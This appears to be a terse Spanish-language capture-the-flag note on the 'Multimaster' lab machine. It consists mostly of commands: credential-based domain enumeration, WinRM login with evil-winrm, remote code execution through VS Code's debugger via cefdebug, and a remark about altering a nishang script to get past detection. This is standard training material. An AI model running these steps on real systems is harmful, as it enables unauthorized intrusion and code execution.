# MULTIMASTER Credenciales: `tushikikatomo:finance1` #### rpcclient ``` rpcclient -U "tushikikatomo%finance1" 10.10.10.179 enumdomusers ```  ``` rpcclient -U "tushikikatomo%finance1" 10.10.10.179 -c "enumdomusers" | grep -oP '\[.*?\]' | grep -v "0x" | tr -d "[]" > users ``` ``` ldapdomaindump -u 'MEGACORP\tushikikatomo' -p 'finance1' 10.10.10.179 ```  ``` php -S 0.0.0.0:80 ```  ``` crackmapexec winrm 10.10.10.179 -u 'tushikikatomo' -p 'finance1' ```  ``` evil-winrm -i 10.10.10.179 -u 'tushikikatomo' -p 'finance1' ```  ``` net user tushikikatomo ```  ``` Get-Process ```   ``` C:\Program Files\Microsoft VS Code\bin> .\code -h ```  Versión: 1.37.1 ``` https://github.com/taviso/cefdebug ``` ``` \cefdebug.exe ```  ``` .\cefdebug.exe --url "ws://127.0.0.1:35063/a5b92cbc-91be-4fcc-b7b6-68bc8cbfc4fe" --code "process.mainModule.require('child_process').exec('ping 10.10.14.11')" ```  ``` tcpdump -i tun0 icmp -n ```  Existe traza ICMP Existe problemas con el nishang, por ello se borran los comentarios y se cambia ne nombre al script 
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up